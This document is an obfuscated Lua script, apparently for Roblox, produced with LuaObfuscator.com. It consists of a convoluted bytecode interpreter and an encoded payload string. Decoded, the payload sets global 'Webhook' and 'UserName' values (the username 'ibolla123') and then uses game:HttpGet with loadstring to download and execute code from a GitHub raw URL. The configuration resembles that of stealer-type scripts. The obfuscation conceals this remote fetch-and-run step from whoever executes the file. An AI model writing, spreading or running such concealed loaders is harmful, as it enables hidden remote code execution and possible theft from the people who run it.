--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(139 + 416 + 11 + 53)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=2^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and ((1805 -(282 + 595)) -(214 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1640 -(1523 + 114)) );v19=v19 + 4 + 0 ;return (v37 * ((104146254 -80228800) -7140238)) + (v36 * (66601 -(68 + 997))) + (v35 * ((1643 -(32 + 85)) -(226 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(2 -1)) then else v41=nil;v42=nil;v38=1415 -(447 + 966) ;end if (v38~=(5 -3)) then else v43=nil;v44=nil;v38=1820 -(1703 + 114) ;end if (v38~=(704 -(376 + 325))) then else v45=nil;while true do local v89=0;local v90;while true do if (v89==0) then v90=0;while true do if ((0 -0)~=v90) then else local v98=0 -0 ;while true do if (v98~=1) then else v90=1 + 0 ;break;end if (v98==0) then if (v39==(0 -0)) then v40={};v41={};v42={};v39=1;end if (v39~=(17 -(9 + 5))) then else for v137=1,v24() do v41[v137-(377 -(85 + 291)) ]=v29();end return v43;end v98=1;end end end if (v90~=1) then else if (v39==2) then local v99=1265 -(243 + 1022) ;while true do if (v99~=(0 -0)) then else for v139=1,v44 do local v140=0;local v141;local v142;local v143;local v144;while true do if (v140==2) then while true do if (v141==(1 + 0)) then v144=nil;while true do if (1==v142) then if (v143==(1181 -(1123 + 57))) then v144=v22()~=0 ;elseif (v143==(2 + 0)) then v144=v25();elseif (v143==(257 -(163 + 91))) then v144=v26();end v45[v139]=v144;break;end if (v142~=(1930 -(1869 + 61))) then else local v176=0 + 0 ;local v177;local v178;while true do if (v176==0) then v177=0;v178=nil;v176=1;end if (v176~=(3 -2)) then else while true do if (v177==0) then v178=0 -0 ;while true do if (v178==(0 + 0)) then local v188=0;while true do if (v188~=1) then else v178=1;break;end if (v188~=0) then else v143=v22();v144=nil;v188=1 -0 ;end end end if (v178==1) then v142=1;break;end end break;end end break;end end end end break;end if (v141~=(0 + 0)) then else local v174=1474 -(1329 + 145) ;while true do if (v174==0) then v142=971 -(140 + 831) ;v143=nil;v174=1851 -(1409 + 441) ;end if (v174==(719 -(15 + 703))) then v141=1;break;end end end end break;end if (v140~=(1 + 0)) then else v143=nil;v144=nil;v140=2;end if (v140==(438 -(262 + 176))) then v141=0;v142=nil;v140=1722 -(345 + 1376) ;end end end v43[691 -(198 + 490) ]=v22();v99=1;end if (v99~=(4 -3)) then else for v145=1,v24() do local v146=0;local v147;local v148;local v149;while true do if (v146==1) then v149=nil;while true do if (v147==0) then v148=0;v149=nil;v147=2 -1 ;end if (v147==1) then while true do if (v148==0) then v149=v22();if (v21(v149,1207 -(696 + 510) ,1 -0 )==(1262 -(1091 + 171))) then local v179=0;local v180;local v181;local v182;local v183;while true do if (v179==1) then v182=nil;v183=nil;v179=1 + 1 ;end if (0==v179) then v180=0 -0 ;v181=nil;v179=1;end if ((6 -4)==v179) then while true do if (v180==(376 -(123 + 251))) then local v184=0;local v185;while true do if (v184==0) then v185=0 -0 ;while true do if (0~=v185) then else local v194=698 -(208 + 490) ;while true do if (v194==(0 + 0)) then if (v21(v182,1 + 0 ,1)==(837 -(660 + 176))) then v183[1 + 1 ]=v45[v183[2]];end if (v21(v182,204 -(14 + 188) ,677 -(534 + 141) )==1) then v183[3]=v45[v183[3]];end v194=1 + 0 ;end if (v194~=1) then else v185=1 + 0 ;break;end end end if (1~=v185) then else v180=3 + 0 ;break;end end break;end end end if (v180==0) then local v186=0 -0 ;while true do if (v186==(0 -0)) then v181=v21(v149,5 -3 ,2 + 1 );v182=v21(v149,4,6);v186=1 + 0 ;end if ((397 -(115 + 281))~=v186) then else v180=1;break;end end end if (v180==(6 -3)) then if (v21(v182,3 + 0 ,3)==(2 -1)) then v183[4]=v45[v183[14 -10 ]];end v40[v145]=v183;break;end if (v180~=(868 -(550 + 317))) then else v183={v23(),v23(),nil,nil};if (v181==(285 -(134 + 151))) then local v191=1665 -(970 + 695) ;local v192;while true do if (v191~=0) then else v192=0 -0 ;while true do if (v192~=0) then else v183[1993 -(582 + 1408) ]=v23();v183[4]=v23();break;end end break;end end elseif (v181==(3 -2)) then v183[3 -0 ]=v24();elseif (v181==2) then v183[11 -8 ]=v24() -((1826 -(1195 + 629))^16) ;elseif (v181==3) then local v198=0;local v199;local v200;while true do if (v198==1) then while true do if (v199==0) then v200=0;while true do if (v200==0) then v183[3]=v24() -((2 -0)^16) ;v183[4]=v23();break;end end break;end end break;end if (v198~=(241 -(187 + 54))) then else v199=780 -(162 + 618) ;v200=nil;v198=1 + 0 ;end end end v180=2 + 0 ;end end break;end end end break;end end break;end end break;end if (0==v146) then v147=0;v148=nil;v146=1 -0 ;end end end v39=4 -1 ;break;end end end if (v39~=(1 + 0)) then else v43={v40,v41,nil,v42};v44=v24();v45={};v39=2;end break;end end break;end end end break;end if (v38~=(0 -0)) then else v39=0 -0 ;v40=nil;v38=1385 -(746 + 638) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1025 -(706 + 318))) then v49=1 -0 ;v50=(v21(v48,1252 -(721 + 530) ,361 -(218 + 123) ) * (((501 + 1082) -(389 + 1146 + 46))^(32 + 0))) + v47 ;v46=2;end if (v46==((2075 -1372) -(271 + 429))) then if (v51==(0 + 0)) then if (v50==0) then return v52 * (560 -(306 + 254)) ;else v51=1;v49=0 + 0 ;end elseif (v51==(3335 -(993 + 295))) then return ((v50==(0 -0)) and (v52 * (((3974 -2506) -(899 + 568))/(0 + (114 -(4 + 110)))))) or (v52 * NaN) ;end return v8(v52,v51-(106 + 917) ) * (v49 + (v50/((2 + 0)^(125 -73)))) ;end if ((529 -(406 + 123))==v46) then v47=v24();v48=v24();v46=604 -(268 + (919 -(57 + 527))) ;end if (v46==(292 -(60 + 230))) then v51=v21(v48,593 -(426 + (1573 -(41 + 1386))) ,12 + (122 -(17 + 86)) );v52=((v21(v48,4 + 20 + 8 )==(1457 -(282 + 1174))) and  -(812 -(569 + 242))) or ((3 -1) -1) ;v46=1 + (5 -3) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then local v85=(25 + 141) -(122 + 44) ;while true do if (v85==(0 -0)) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -(1 + 0) );v19=v19 + v53 ;local v55={};for v67=1 -0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=65 -(30 + 35) ;local v58;local v59;while true do if (v57==(0 + 0)) then v58,v59=v1(v16,v19,v19 + (1259 -(1043 + (534 -(53 + 267)))) );v19=v19 + (7 -5) ;v57=(275 + 938) -(323 + 889) ;end if (v57==(2 -1)) then return (v59 * (836 -(361 + 219))) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v86=v2(v0(v60,16));if v20 then local v91=v5(v86,v20);v20=nil;return v91;else return v86;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=0;while true do if (v88==1) then if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then v79[v81[2]]();else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=2) then local v102=0;local v103;while true do if (v102==0) then v103=v81[2];v79[v103]=v79[v103](v13(v79,v103 + 1 ,v74));break;end end elseif (v82==3) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]();end elseif (v82<=7) then if (v82<=5) then local v104=0;local v105;local v106;while true do if (v104==0) then v105=v81[2];v106=v79[v81[3]];v104=1;end if (v104==1) then v79[v105 + 1 ]=v106;v79[v105]=v106[v81[4]];break;end end elseif (v82>6) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else do return;end end elseif (v82<=8) then local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==1) then v74=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v161=v108,v74 do v111=v111 + 1 ;v79[v161]=v109[v111];end break;end if (v107==0) then v108=v81[2];v109,v110=v72(v79[v108](v13(v79,v108 + 1 ,v81[3])));v107=1;end end elseif (v82==9) then v79[v81[2]]=v81[3];else local v123=0;local v124;local v125;while true do if (v123==1) then v79[v124 + 1 ]=v125;v79[v124]=v125[v81[4]];break;end if (v123==0) then v124=v81[2];v125=v79[v81[3]];v123=1;end end end elseif (v82<=15) then if (v82<=12) then if (v82==11) then v79[v81[2]]=v81[3];else local v114=0;local v115;while true do if (v114==0) then v115=v81[2];v79[v115]=v79[v115](v13(v79,v115 + 1 ,v74));break;end end end elseif (v82<=13) then v73=v81[3];elseif (v82>14) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=18) then if (v82<=16) then v73=v81[3];elseif (v82>17) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==0) then v130=v81[2];v131,v132=v72(v79[v130](v13(v79,v130 + 1 ,v81[3])));v129=1;end if (v129==2) then for v171=v130,v74 do v133=v133 + 1 ;v79[v171]=v131[v133];end break;end if (v129==1) then v74=(v132 + v130) -1 ;v133=0;v129=2;end end else v79[v81[2]]=v63[v81[3]];end elseif (v82<=19) then do return;end elseif (v82==20) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;break;end if (v88==0) then v81=v69[v73];v82=v81[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030A3O0069622O6F6C613132332003093O00557365724E616D6532030C3O0069622O6F6C613132333O2000173O0012093O00013O0026143O000E0001000200040D3O000E0001001211000100033O00300F000100040005001211000100063O001211000200073O002005000200020008001209000400094O0015000500014O0012000200054O000C00013O00022O000100010001000100040D3O001600010026143O00010001000100040D3O00010001001211000100033O00300F0001000A000B001211000100033O00300F0001000C000D0012093O00023O00040D3O000100012O00133O00017O00",v9(),...);end
